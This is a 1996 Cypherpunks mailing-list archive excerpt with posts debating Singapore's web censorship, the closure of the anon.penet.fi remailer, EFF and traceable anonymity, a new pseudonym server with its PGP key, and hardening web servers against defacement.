decide what materials to buy, have viewed by employees, etc. (So if the "Valley Lesbigays" want to show a tape at Hewlett-Packard, H-P can just say "Nope--we're not interested.) I fully support legalization of all drugs, all guns, and am unalterably opposed to any form of government censorship. Does this mean I pass or flunk the litmus test? (He said acidly.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From bobs at ns.net Mon Sep 2 01:18:25 1996 From: bobs at ns.net (Cyber Thrill) Date: Mon, 2 Sep 1996 16:18:25 +0800 Subject: desubscribe Message-ID: <199609020550.WAA06206@tomcat.ns.net> desubscribe From Adamsc at io-online.com Mon Sep 2 01:18:42 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 2 Sep 1996 16:18:42 +0800 Subject: Moscowchannel.com hack Message-ID: <19960902052808718.AAA203@IO-ONLINE.COM> On Sun, 1 Sep 1996 12:22:40 -0500 (CDT), Igor Chudov @ home wrote: >> > > Write your web site to a CD-ROM and hard-code the base directory into the >> > > webserver. >> > >> > A hacker who has root can forcibly unmount the cdrom and mount another >> > directory on that node. Not a good solution. >> >> Real hard disks such as RL02's & RK07's have WRITE DISABLE >> switches.... >> > >You can't mount the whole Unix read-only, so there will always be a place >to put the hacked web page, and then mount that place over DocumentRoot. If you had enough RAM in the machine, you could disable swapping, send all log files to /dev/nul (or /dev/lp0), run *only* a web server or anything else that can avoid writing to disk (probably no CGI, etc). It wouldn't be too interesting, but then you probably don't want much happening on your web server anyway. You could even wire that write-disable switch or jumper into a keyswitch on the main console. - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From tcmay at got.net Mon Sep 2 02:01:13 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 17:01:13 +0800 Subject: Free Speech and List Topics Message-ID: At 5:17 AM 9/2/96, qut wrote: >About the need for limits for anonymity, guess what brought that on? >Crime? Yes! The crime of the media monopoly violating the anti-trust >acts, because people are ignorant enough to trust the mass media for >their news. No self-respecting Cypherpunk thinks the Antitrust Act and related acts are worthy of enforcement. (Think of how the technology we support will tend to allow new avenues for price collusion, interlocking directorates, new forms of business combines, unreadable secure communications with foreign competitors, and so on, all things the Antitrust regulators are already growing worried about.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Mon Sep 2 02:01:46 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 17:01:46 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <199609020630.XAA20578@toad.com> At 07:06 AM 9/2/96 +0800, James Seng wrote: >Just let to add my comment in regard to this unforuntate discusssion. >To understand the sitution better, you should not impose America >idealogy and perspection on how things to be done to Singapore. >Singapore maybe young but there are certain culture too. While Tim's article title was clearly intended to be provocative, I think the most unfortunate thing about this discussion is that we need to have it at all. Any government, or any individual thug, that would impose violence on people for saying things that would bring it into disrespect deserves no respect at all. Any government that claims to have the god-like wisdom to dictate what's best for its subjects to hear or what religious ideas to believe doesn't deserve to be listened to, much less obeyed. If Singapore's government and religious leaders want to say "Our ideas are better than American ideas", and you or I or your neighbor want to listen to them, fine; maybe some of their ideas are better than some of the many ideas floating around North America. But if you or I or your neighbor want to listen to competing ideas, and even to believe and talk about competing ideas, neither you nor the government have the right to stop them - only to refute them with better ideas. People like Tim and I aren't upset only because we believe that we know better than you and Lee Kwan Yew how to run Singapore; free speech is often threatened here in the US and especially Canada. You mentioned movie ratings - they were invented here partly to avoid the threat of government censorship. A few years ago a prominent right-wing religious/political leader, Jerry Falwell, put out a "Bill Of Rights For American Families" that included the right not to hear offensive foreign ideas like Communism. I agree that Singapore and America have different cultures; in an environment of free speech, if Singaporeans don't like American TV and movies, they won't watch them, and advertisers will quickly figure this out and try to find TV programs they like. On the other hand, if a power-hungry government decides that it doesn't like American TV, forbids business licenses to anyone who broadcasts it, and jails anyone who broadcasts TV without a business license, they're more corrupt than a government that forbids business licenses to anyone who doesn't pay a bribe. (At least in a kleptocracy, you can usually print or say what you want if you pay the bribes, though my father-in-law's newspaper was once shut down for printing that the mayor was taking bribes, and who they were from, and how much.) >In addition, you need to see the method of censorship deployed in >Singapore. For press media like papers and magazine, it is done in a >passive manner. They _do not_ read every issue of every magazine available >in Singapore. They only do so when there is enough complains. This also means you don't know what is safe to print and what isn't. You have to restrict yourself very strongly, because otherwise some politically influential person will complain to the government, and you go to jail. At least if the government tells you what the rules are, you know it's safe to say things that don't violate them. >One more point. They know it is impossible to censor everything. [....] >his reasoning is "how many people can do it? 10%? 5%? That's fine with us. >If the people really wans it, they can get it". Interesting. I don't know if this is good or bad, but at least they're realistic. It also means that if enough people want information badly enough, the government may know not to censor it. On the other hand, a government that can keep the leader of an opposition political party in jail for years just because he opposes them is pretty corrupt. >if you wish to rebuke the points which i mention above, please feel >free to do so but do so in the context wrt Singapore culture. >Do not impose the general idealogy and culture within >your country into your argument. The right to speak freely without government thugs shutting you down and throwing you in jail or killing you is a universal one. The ability to get anybody to listen to what you have to say, on the other hand, is highly dependent both on general culture and on the interests of the individuals you hope will listen, as well as on what you have to say and your ability to say it well. >Now, what makes you think that citizen of Country A has the power or >rights to tell politicians of Country B what to do and what they cannot do? >Just wondering. Because I have a mouth and a conscience, and they have ears and consciences. I certainly have more right to tell a politician in Country B not to stop his subjects from speaking than he does to order them not to speak. And if the politicians over here are wrong, which they often are, you've got the right to tell them that too. Of course, the politicians over here usually won't listen to you, and the politicians over there either won't listen to me or they'll add my name to the firewall killfile :-) But it's also safer for me to tell your politicians to behave well than for you to tell them, since you have to live with them. >ps: Sorry for the off-topic discussion. It's not off-topic. Building tools to prevent censorship is distinctly on-topic for cypherpunks, and an occasional digression into whether it's a good idea is worthwhile. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority! From patrickbc at juno.com Mon Sep 2 02:15:47 1996 From: patrickbc at juno.com (patrick b cummings) Date: Mon, 2 Sep 1996 17:15:47 +0800 Subject: free speech online Message-ID: <19960901.014144.9678.2.patrickbc@juno.com> I agree that their should be free speech on the net. Someone should start a petition and get as many people to sign it as possible. From unicorn at schloss.li Mon Sep 2 02:17:27 1996 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 2 Sep 1996 17:17:27 +0800 Subject: "Security risks" vs. "credit risks" In-Reply-To: Message-ID: On Sat, 31 Aug 1996, Timothy C. May wrote: > I find the notion that one's speeches and Usenet utterances could "harm > one's security rating" a distasteful idea, but so long as such security > ratings are handled by private players, and used by private players, I see > no illegality. Yet another reason to be a pseudonym in the United States. I tend to agree with Mr. May. I don't really care who has "access" to information provided they do not have access to government collection resources. The former can be detered suiimply by taking measures to prevent your information from being introdued into the system. They only get what you give them. The second would be more disturbing. One only deserves what privacy one secures for one's self. > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Licensed Ontologist | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Mon Sep 2 02:33:27 1996 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 2 Sep 1996 17:33:27 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com> Message-ID: On Sun, 1 Sep 1996, Esther Dyson wrote: > Now, speaking personally: I believe there are trade-offs -- which is what I > told the LA Times. I assume I was quoted accurately (although the word > "enforce" is awkward), but out of context. Anonymity can be dangerous -- > as can traceability, especially in/by repressive regimes. Therefore I would > favor allowing anonymity -- with some form of traceability only under terms > considerably stronger than what are generally required for a wiretap. > Anyone who seriously needs anonymity because of a repressive government is > likely to use a foreign (outside whatever jurisdiction he fears) server, so > that this is not a matter of "local" laws. The tracer would have to pass > through what I hope would be tighter hoops than we have now. > > Please note that this is not the same as the right to *private* > conversations and the use of encryption; this is the issue of being > accountable for what you publish in public. I've left the attributation list open because I think my view a majority one. The inclinations I had to be involved with or financially support EFF are, after reading this, entirely quashed. What is or is not your personal or EFF's official position is meaningless. It is clear that the personal beliefs of those involved in EFF are those of compromise, present day politics, and a general lack of moral fiber. The political assumptions and the degree of technical invasion that would make the above scheme possible are either hopelessly naive, or insidiously invasive. A scheme to make every net goer traceable (albut with some undefined mechanism to "safeguard" against abuse) is, even in its core requirements, frightening. Whatever respect I had for EFF collectively and the individuals working within the organization is much deminished, if it survives at all. > Yes, I'm aware of the complexities, and of the possibilities for > miscarriages of justice. Yet you address this where exactly, even now in your "apology" or "explanation" statement? > Speaking for myself, only (and publicly), > Esther Dyson Perhaps you should have spoken publically but anonymously the first time? Having not done so, I think you have damaged yourself as well as EFF. > Esther Dyson Always make new mistakes! I find the above amusing. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From lutz at as-node.jena.thur.de Mon Sep 2 02:44:39 1996 From: lutz at as-node.jena.thur.de (Lutz Donnerhacke) Date: Mon, 2 Sep 1996 17:44:39 +0800 Subject: Pseudonym server: Jenaer Anonymous Service In-Reply-To: <199609011109.NAA14105@jengate.thur.de> Message-ID: * stewarts at ix.netcom.com wrote: > Jenaer Anonymous Service > looks like a high-security pseudonym server. Thanks. > rather than having it arrive directly. But in return, > it's pretty secure, since you can only get caught if the > remailer or its operator are compromised when you request a delivery. It's strongly recomment to use a reply server to forward your requests to. The server sends all outgoing messages via mixmaster chains. (mixmaster at as-node.jena.thur.de can is always the first one in the chain). The policy of this remailer urges the user to send incoming jobs only via mixmaster chains. It may be changed to drop incoming jobs which does not come from the local mixmaster silently. > I haven't yet checked if how flexible it is about the location > of Reply-To: in the headers, since some mailers make it difficult > to paste that in. Reply-To: is neccessary to be included in the encrypted message body. All readable header informations execpt Subject: {help,send} is drop to /dev/null including the To:, From:, Sender:, Path:, Reply-To: ... lines. > The public key for the server is signed by Lutz.Donnerhacke at Jena.Thur.De, > which is in turn signed by 0x3B7F286D, which MIT thinks is an unknown > signator... 0x3B7F286D is the key of Winfried Mueller, the maintainer and autor of Religio, an information system anout religious subjects. A lot of documents fight against Scientology. Try http://Www.thur.de/religio/. Type Bits/KeyID Date User ID pub 2048/39F37F5D 1996/04/25 Lutz Donnerhacke Lutz Donnerhacke -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzGACKIAAAEIAMSu8OdG/ZNUiN1qc/eobx53oCeOW3iaxWIrK3q9XgBfzHwy AuwumYmL+mgCFnP7jkmk0Y4mst6UszujK+mplzuqzCox+7mUhBl0swQQ/0Bqg8HX 0lm0oYoTnQoeUMcoqCGcj1PbO8Gm40nlXj6wKHzhWQfIVkvhyzUODEhu/Pr0mf9V PtjVoWya8qD+LleM6u8GHsGP2bfERUfFDr6cmdtbUg24U/lsenYzzE5kW1VUyFqK YqRGJoDy1ZQlXIgVG6wULdNcJ96Vc2tEMRMWASvxxS9BJORUC0nRAE6sqBKXiQ93 +x06J3xEaSuCVv9DxyFl8HIQzOtzCdxwOTnzf10ABRG0MEx1dHogRG9ubmVyaGFj a2UgPEx1dHouRG9ubmVyaGFja2VASmVuYS5UaHVyLkRlPokBFQMFEDG9XE/4w3ah osUXSQEBgeoH/iA1uhqU3RsqebIgJquaTB2e5m9NfZdD108ctmhbf191IodV+Doz oWAp9GH9PMhD/vEERoiuwNJCGGCUDooaRXR4ZRh6I8Tb4D+C53uiPqaNKdzjaZTi gQ3I/odRwpoggWqr5d8SjIG4Hf5ERB39wdMSrzmHpXYJJRdLvVh9tYFhmS1islDB vAUxAVlnWKk1vLkbn4cSuIrZL53HQ60fBfcK9MVAPelHhi4jh1J3JN8NJk8bsht6 lx5BfdygLN5Mn4FEQ0JveH2kH2xmSoQvHuAjo1YzBJePOoyJgfJ/QcwNx7ZAcewC HvaogTeALtt0n11q67/1PNOq3/5D+CMqB8iJAJUDBRAxgT1EYH38Rzt/KG0BATIr BACijD0IjjePaO0ZVU2zk+OChpXmztf512PwIf6nRcdlOC+DtoK/EusXJoUx2lmb 8M8sJiaN9PgCOj21QfbpkEcyCCXdKfpBvtj5g73OruJdSCFV+O9Pts8jEqlTK+zo we/Rqr/Nd08Sh0dkQ8E0hlpUVgQkGUiBs5T8LNSeV9G8LIkBFQMFEDGACKMJ3HA5 OfN/XQEB/+QH/20sSVx0VZyv6bbX4t37dd8uY0ZmY7ZxAkwTFZD9wgmcpCQ11cTY 2ZiAKZFheSo4HirBtdKKmW9jMl2GuOs/yDT3JUEcFLSdsFEeqy3EzDYCpJDlm+pV Vd1BidO3phnt6mqbHoKVbwD0+SL6ZxvRzUscnLL3fEDuIepJ4RGlTH6K8cfooDi3 AI6SBPlphO92ZEeVYs/MRCziwhyYHBAZ3ldJJR23V2vlRaB8LO/UhtcZ8aAHXBi2 XbML4sI4qVqvWEeDLe42lAEmlzgm9zzzvjeBHUe2h8kUU/p0KWhnBbRBDLIuoY4Z lEogVqB2bzYFZ17IWQtsy7VS7X9IcxERg6m0H0x1dHogRG9ubmVyaGFja2UgPGx1 dHpAZGFuYS5kZT6JARUDBRAxhoKJCdxwOTnzf10BAS90CACENM1MPBE4vg9sm7Bq t7PyUCrO4z0ZGjiVQhAe1e2nzXAWqYbNhg7tpla/eekG146KBq9h7KFd2v3qApyR cosse0KUiuLEiCNne7wnwgHpe0+g5DEMmqqqkInaErxyDLEa12YVcwWkaESQyJD8 B5pgRyf4G1SuDRnhOL1VY3SaZeo8trzwWWFLapPI4Qy6vzm2/LdtprL52pFuTD3J f591mHnnIo3FsYEuMBJUxFYw91dO2RfqSQmqCnR7v4B5IE2OElXZZy8co2rHy969 2IM32oJyRJVbj/U3M+EqOSvhsFmqU6muEUkfvNyknyCGyt1hdATSb4QzwPdMKXRC YTRi =LDb+ -----END PGP PUBLIC KEY BLOCK----- > Because you don't get your reply email until you ask to pick it up, > it does seem easy to abuse; complaints, flames, and mailbombs won't reach you > if you don't ask for them. I hope the operator doesn't mind the workload > of managing the remailer - it looks like a good service, and with > Julf's remailer shut down, we need more nymservers. Sure. My nymserver is completely written as a bash script. -- | Lutz Donnerhacke +49/3641/380259 voice, -60 ISDN, -61 V.34 und Fax | From MAILER-DAEMON at mqg-smtp3.usmc.mil Mon Sep 2 02:47:32 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Mon, 2 Sep 1996 17:47:32 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: It is good that anon.penet.fi has been closed! Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages. UNDEFINED-----BEGIN PGP SIGNED MESSAGE----- On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > I believe that Private Idaho is a cypherpunks remailer client for Windows. True. But it is a seperate program from email clients which means that anyone wanting to use Private Idaho has to download it, install it, and learn how to use it in conjunction with one's email program. Most people who may have a need for anonymity have probably never heard of PGP or Private Idaho. I think that until remailer functions are actually built into the programs that people use, remailer use will be rare. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMipNqizIPc7jvyFpAQFy0Qf+LbMgy3PBJ+ipGbxblKbjEm09aiziLEpD p7JCudf6TrBUdF+2PwTdxK/sOCITE9lTwbycAgeCvEYNUJEbsR3a6ix5fxbQuF8p Y9/tEbLVESUz0/+UthVnBasbFsCOzHV+ztlIRIk8SEEJKxsu8cNRZqcjaAqH5Q1A dmBKZ9KGQWPNuc5oLfqahyzroa8kAG59HSDm+ntV9fwduKNi8wSV6WFmA2s9pnZa +yRRXmSm4PkWVXgNdQCosTTcD1enSIBcH2WAQu1jpDZbbs6+6v1KvdPa5+WOvTs3 kpBfFBlsmVkWJS63ouqDb7yihoq/qZvhyE2Fske8uVYh9M5Ffn9AKg== =md6D -----END PGP SIGNATURE----- From MAILER-DAEMON at mqg-smtp3.usmc.mil Mon Sep 2 02:52:11 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Mon, 2 Sep 1996 17:52:11 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: DON'T Nuke Singapore Back into the Stone Age Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages. UNDEFINED-----BEGIN PGP SIGNED MESSAGE----- On Mon, 2 Sep 1996, James Seng wrote: > Now, what makes you think that citizen of Country A has the power or > rights to tell politicians of Country B what to do and what they cannot do? > Just wondering. I have every right as a citizen of country A to tell politicians of country B what they should or shouldn't do. This isn't about American Ideology; it's about natural rights. Politicians of country B can refuse to listen to me or attempt to prevent my corrupt ideas from polluting the minds of its citizens, but they won't succeed very well with the latter. Of course, politicians may be satisfied with making sure that only the most determined citizens will be able to access information they don't want citizens to access, but as technology progresses, it will become much more difficult to prevent this information from spreading to the masses. > > ps: Sorry for the off-topic discussion. Cpunks is certainly not the best place to be discussing free speech. However, the link between free speech and the spread of cryptographic technology is too close to completely overlook. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMipSASzIPc7jvyFpAQFYyAgAuy7FvTpGHqYHi9zw3FMiea2tLnYVWPU6 D6VrGvN5NxRtTE8yW3eKrc1iU/0jQIVxHtUhHcodbPfvGqEtwuZKKbbknNj5GmzS pmhcYPguXDwlXL4m3IjxEvhPg7GZ7tjbhXlPK7ADu0EHxvjwesAcrKyCPddu0i9U e83bo3Q4vBT75WPVpSI1i6jJmC7ql4s3GZVvP2Qf6hzvu9fwSKbAra0ZLBFVKf25 WKwNK2eTVBcQOYytwXOQmdSV/hgFB/Y2T6+PHgnAjaDVeX3WqUuxggk6DpBY2V8g bORwsuZyweJviVZIOjbLx6RDeNJQWWSjUCojHvJyKzqffg23Fi8bAw== =+23m -----END PGP SIGNATURE----- From stewarts at ix.netcom.com Mon Sep 2 02:53:04 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 17:53:04 +0800 Subject: It is good that anon.penet.fi has been closed! Message-ID: <199609020721.AAA21297@toad.com> In a challenging article posted 12:33 PM 9/1/96 -0500, ichudov at algebra.com (Igor Chudov) wrote: >Yes, subject says it all. anon.penet.fi was a whole lot worse than >cypherpunks remailers. It provided clueless users with no real security, >because it stored return addresses and did not use chaining and >encryption. There are different reasons people use remailers, different amounts of security they need, and different levels of security that the remailers can provide. Anon.penet.fi was a Good Thing. It got a few hundred thousand people thinking about remailers, and why they want them, and thinking they were good tools. It helped the public learn that anonymity is useful for real people, and helped the public learn that they can't always believe an email message is from the "person" on the From: line, and that email and news postings aren't always authentic just because they come out of a computer :-) One way to provide privacy is through heavy mathematics; for some people, and some threats, you need that. Another way to provide privacy is through a trusted operator who's willing to put up with a lot of crap to provide the service. For many people, that's enough - not for people worried about eavesdroppers and overthrowing governments, but enough for people talking about their attitudes toward work and sex and drugs who don't want their email traced by their employers, nosy neighbors, or local vice cops. And part of this security is the willingness to close down a popular service when it's security is threatened. One feature that's really needed for many remailer applications is reply addresses. Doing that securely with cypherpunks-style remailers is hard; doing it securely with trusted-sysop remailers is much easier, and even then there were occasional bugs, and plain surprises. In general, anything that knows the return path is vulnerable; if the person sending the reply knows the destination address, which doesn't apply to many of the applications, the remailer system in between can be secure, but otherwise you're not "truly secure" - only "pretty good". Knowing what the users really want to do helps you do it more securely. >From what I know of remailer history, the main original goal of the cypherpunks-style remailer was to provide security against traffic analysis by eavesdroppers, rather than to prevent the recipient from knowing the sender's address, though everybody pretty quickly realized that the latter was an interesting feature, especially coupled with posting to Usenet. Learning the differences between what people will really do with 2-way remailers as opposed to 1-way remailers can be done better with an easy-to-use 2-way remailer like penet.fi which can get 500,000 (possibly duplicated) users than with moderately complicated systems like alpha.c2.org or the really complicated things that may be needed to get better security. >Maybe closing of anon.penet.fi will spur real interest from the unwashed >alt.sex.* masses to the truly secure remailers. Who knows; maybe the most effective way to fund "truly secure" (bwah-hah-ha) remailers will turn out to be to carry phone sex advertising :-) Or maybe somebody will build a decent digicash interface to a remailer, which will help get digicash going now that everybody who uses remailers will be looking for a new home. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority! From stewarts at ix.netcom.com Mon Sep 2 02:55:00 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 17:55:00 +0800 Subject: It is good that anon.penet.fi has been closed! Message-ID: <199609020724.AAA21368@toad.com> In a challenging article posted 12:33 PM 9/1/96 -0500, ichudov at algebra.com (Igor Chudov) wrote: >Yes, subject says it all. anon.penet.fi was a whole lot worse than >cypherpunks remailers. It provided clueless users with no real security, >because it stored return addresses and did not use chaining and >encryption. There are different reasons people use remailers, different amounts of security they need, and different levels of security that the remailers can provide. Anon.penet.fi was a Good Thing. It got a few hundred thousand people thinking about remailers, and why they want them, and thinking they were good tools. It helped the public learn that anonymity is useful for real people, and helped the public learn that they can't always believe an email message is from the "person" on the From: line, and that email and news postings aren't always authentic just because they come out of a computer :-) One way to provide privacy is through heavy mathematics; for some people, and some threats, you need that. Another way to provide privacy is through a trusted operator who's willing to put up with a lot of crap to provide the service. For many people, that's enough - not for people worried about eavesdroppers and overthrowing governments, but enough for people talking about their attitudes toward work and sex and drugs who don't want their email traced by their employers, nosy neighbors, or local vice cops. And part of this security is the willingness to close down a popular service when it's security is threatened. One feature that's really needed for many remailer applications is reply addresses. Doing that securely with cypherpunks-style remailers is hard; doing it securely with trusted-sysop remailers is much easier, and even then there were occasional bugs, and plain surprises. In general, anything that knows the return path is vulnerable; if the person sending the reply knows the destination address, which doesn't apply to many of the applications, the remailer system in between can be secure, but otherwise you're not "truly secure" - only "pretty good". Knowing what the users really want to do helps you do it more securely. >From what I know of remailer history, the main original goal of the cypherpunks-style remailer was to provide security against traffic analysis by eavesdroppers, rather than to prevent the recipient from knowing the sender's address, though everybody pretty quickly realized that the latter was an interesting feature, especially coupled with posting to Usenet. Learning the differences between what people will really do with 2-way remailers as opposed to 1-way remailers can be done better with an easy-to-use 2-way remailer like penet.fi which can get 500,000 (possibly duplicated) users than with moderately complicated systems like alpha.c2.org or the really complicated things that may be needed to get better security. >Maybe closing of anon.penet.fi will spur real interest from the unwashed >alt.sex.* masses to the truly secure remailers. Who knows; maybe the most effective way to fund "truly secure" (bwah-hah-ha) remailers will turn out to be to carry phone sex advertising :-) Or maybe somebody will build a decent digicash interface to a remailer, which will help get digicash going now that everybody who uses remailers will be looking for a new home. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority! From stewarts at ix.netcom.com Mon Sep 2 03:02:15 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 2 Sep 1996 18:02:15 +0800 Subject: Educating former anon.penet.fi users about other remailers Message-ID: <199609020724.AAA21373@toad.com> I've gotten about 5 messages from daemon at anon.penet.fi telling me that the remailer is closed; don't know if they're from various previous identities, or if they're from postings to mailing lists with anonymous people on them, or whatever. If somebody were to put together a one-page note on other remailers, would it make sense to send it to all the penet.fi users? A canonical cypherpunks approach would be to just write one and send it to na000001 at anon.penet.fi ..... na600000 at anon.penet.fi, but I assume either my system or Julf's would decide it was spam and discard it (even if it were split up into 60,000 10-message chunks.) The press release on www.penet.fi does contain pointers to the FAQs, but people have to go looking for that. On the other hand, if there are an extra 10,000 hits per day on alpha.c2.org because of a really well-written one-page blurb, can it handle the load? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # Reassign Authority! From jseng at pobox.org.sg Mon Sep 2 04:56:36 1996 From: jseng at pobox.org.sg (James Seng) Date: Mon, 2 Sep 1996 19:56:36 +0800 Subject: Encourage Singapore To Come Out Of the Stone Age Message-ID: <199609020913.TAA11331@jagumba.anu.edu.au> At 11:29 PM 9/1/96 -0700, Bill Stewart wrote: >bring it into disrespect deserves no respect at all. Any government >that claims to have the god-like wisdom to dictate what's best for >its subjects to hear or what religious ideas to believe doesn't >deserve to be listened to, much less obeyed. If Singapore's government >and religious leaders want to say "Our ideas are better than American >ideas", and you or I or your neighbor want to listen to them, fine; I think you have misunderstood my posting. I never say Singapore ideas are better than American ideas. What i am saying is that Asian (Singapore) values are _DIFFERENT_ from western (America) values. [i know i am generalising] When you look at the laws and regulation. You cannot just look at what you think is best. You have to look at other things. Culture, social and economical structure, religion and history. In every aspect, Singapore (or most Asian for that matter) are different. Thus, you cannot judge a Singapore government action based on your social background. My purpose of posting is to hope to bring some light to the people here about some social norm in Singapore, hopefully to explain why the government choose to block certain WWW and yet was not strongly opposited here. Secondly, you do not need to convience me. I agree with you totally. What you have to convience is the general population here, against the culture, the society and everything. >maybe some of their ideas are better than some of the many ideas >floating around North America. But if you or I or your neighbor >want to listen to competing ideas, and even to believe and talk about >competing ideas, neither you nor the government have the right to >stop them - only to refute them with better ideas. Nope. I am open to ideas which is why i been watching to this thread. I find it is rather constructive to see how people think about Singapore and then compare it with my own ideas. However, i also know it is useless to have continue discussion with fanatic as they have a tendancy to distored what you say to suit their argument. Nor are they particular open minded to listen to others like our dear Tim has clearly shown us. This is why i am responsing to your article and not his. >On the other hand, if a power-hungry government decides that it doesn't >like American TV, forbids business licenses to anyone who broadcasts it, >and jails anyone who broadcasts TV without a business license, >they're more corrupt than a government that forbids business licenses to >anyone who doesn't pay a bribe. (At least in a kleptocracy, >you can usually print or say what you want if you pay the bribes, >though my father-in-law's newspaper was once shut down for printing >that the mayor was taking bribes, and who they were from, and how much.) Sad to say, Singapore government does have a lot of power. But i am glad what you mention isnt happening in Singapore. I havent heard of any serious corruption cases or people accepting bribes etc. Nor does the people here feel a suppressed nor are there general disatifaction. I think you are too influenced with the persepection from 1984. *8) All things works both ways. Power is no otherwise. >This also means you don't know what is safe to print and what isn't. >You have to restrict yourself very strongly, because otherwise >some politically influential person will complain to the government, >and you go to jail. At least if the government tells you what >the rules are, you know it's safe to say things that don't violate them. You dont go to jail for writing articles. You might be sue for deframation if you published something untrue (similar to your civil lawsuit i guess?) and have to pay large sum of money to the person but you dont go to jail. And yes, they are telling the people what _are_ the things now so you know what to avoid. >It also means that if enough people want information badly enough, >the government may know not to censor it. On the other hand, >a government that can keep the leader of an opposition political party >in jail for years just because he opposes them is pretty corrupt. I am not interested in politics so i didnt really know what is happening in that case. for that, i have no comment. >The right to speak freely without government thugs shutting you down >and throwing you in jail or killing you is a universal one. >The ability to get anybody to listen to what you have to say, >on the other hand, is highly dependent both on general culture >and on the interests of the individuals you hope will listen, >as well as on what you have to say and your ability to say it well. Very true. So does the First Amendment said. Singapore does have such similar law as First Amendment which is slight "modified". You have freedom of speech as long as your comments does not endanger religious/racist harmony and national security. (I do not know the exact term..need a lawyer for that..). The reasons for this are for historical reasons which trace back. >Because I have a mouth and a conscience, and they have ears and consciences. >I certainly have more right to tell a politician in Country B not to >stop his subjects from speaking than he does to order them not to speak. >And if the politicians over here are wrong, which they often are, >you've got the right to tell them that too. Of course, the politicians >over here usually won't listen to you, and the politicians over there >either won't listen to me or they'll add my name to the firewall killfile :-) >But it's also safer for me to tell your politicians to behave well than >for you to tell them, since you have to live with them. Fair enough. Point taken and you are right. I was able to say that you are not the one who are going to vote for/against them in the next election. *8) >It's not off-topic. Building tools to prevent censorship is >distinctly on-topic for cypherpunks, and an occasional digression into >whether it's a good idea is worthwhile. Perhaps but not to the other thousand of other cypherpunk subscribers. With this, i hope i have explained any misunderstanding with the previous posting. If you wish to carried on with this discussion, please feel feel to email me directly. -James Seng From proff at suburbia.net Mon Sep 2 06:23:51 1996 From: proff at suburbia.net (Julian Assange) Date: Mon, 2 Sep 1996 21:23:51 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi 